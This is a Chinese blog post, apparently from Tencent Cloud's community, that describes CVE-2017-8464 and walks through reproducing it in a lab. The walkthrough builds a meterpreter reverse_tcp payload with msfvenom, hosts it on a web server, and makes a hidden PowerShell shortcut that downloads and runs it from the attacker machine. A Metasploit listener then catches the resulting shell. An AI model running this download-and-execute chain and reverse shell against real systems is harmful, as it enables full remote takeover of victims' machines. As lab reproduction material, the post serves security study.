CVE-2017-8464远程命令执行漏洞(震网漏洞)复现

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

漏洞描述

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

漏洞利用条件和方式: 

远程利用

漏洞影响范围: 

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

漏洞复现:

利用原理:

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

环境搭建:

攻击机:kali  ip:10.0.0.140

目标靶机:win2008r2x64 ip:192.168.99.104

1.kali下生成一个反弹的 ps1的shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.140 lport=5555 -f psh-reflection>/opt/search.ps1

2.切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门

cd /opt

3.将生成的search.ps1拷贝到/var/www/html目录下

mv search.ps1 /var/www/html

4.启动apache服务

service apache2 start

5.访问web下的search.ps1,可以直接访问:

6.在靶机上创建一个powershell远程快捷:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.140/search.ps1');test.ps1"

7.名称为:powershell.exe

8.kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:

use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpshow optionsset LHOST 10.0.0.140set lport 5555 exploit

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏张善友的专栏

使用Glimpse 监测ASP.NET MVC网站

使用MiniProfiler调试ASP.NET MVC网站性能,MiniProfiler可以很好的处理网站后端每个处理时间的事件,但是MiniProfiler是...

2259
来自专栏Ken的杂谈

CentOS 7 下安装部署.NET Core多版本环境

.NET Core作为 .NET的开源版本,可以说是非常拥抱开源了,更新的力度也非常给力。却也从开源世界学了点坏东西,那就是:不再重视向下兼容(比如 .NET ...

2672
来自专栏张善友的专栏

NDoc - .NET 代码文档生成器

NDoc 可以将 C#.NET 编译生成的程序集和对应的 /doc XML 文档,自动转换成如 .NET Framework SDK 类库文档或者 MSDN L...

2505
来自专栏WindCoder

安装MySQL被提示缺少msvcr120.dll

当安装MySQL被提示msvcr120.dll缺少,或者类似的.dll缺少,均是系统缺少VC++运行库导致的。

7211
来自专栏光变

Gradle配置http/https/socks代理

为了自己方便,也为了不影响其他人,我配置在了自己的系统用户上面,即${user.home}/.gradle/。

1452
来自专栏hbbliyong

Visual Studio 命令提示符

Visual Studio 命令提示和 SDK 命令提示会自动设置环境变量,使您能够轻松使用 .NET Framework 工具。 在 .NET Framewo...

4386
来自专栏一个爱瞎折腾的程序猿

.net core2.1 使用 dynamic 类型报错

.net core 添加 Nuget 包 Microsoft.CSharp .net Framework 添加 Microsoft.CSharp.dll 引用...

1963
来自专栏晓晨的专栏

.NET Core 项目指定SDK版本

自从 .NET Core 2.1.0版本发布以后,近几个月微软又进行了几次小版本的发布,可见 .NET Core 是一门生命力非常活跃的技术。经过一段时间的实践...

1271
来自专栏ASP.NETCore

最新Linux部署.NET,Mono and DNX

这几天一直在折腾在Linux下的ASP.NET 5,就下在看来在其它操作系统中ASP.NET 5或.NET应用,要想在完整的MS VM(CoreCLR)上运行还...

1022
来自专栏葡萄城控件技术团队

Mac OS 环境下 安装 Asp.Net及使用Yeoman 创建Asp.Net 项目

本文是按照英文原文:Installing ASP.NET 5 On Mac OS安装时遇到的问题的总结Blog。 原文提示如下: Installing ASP....

3329

扫码关注云+社区

领取腾讯云代金券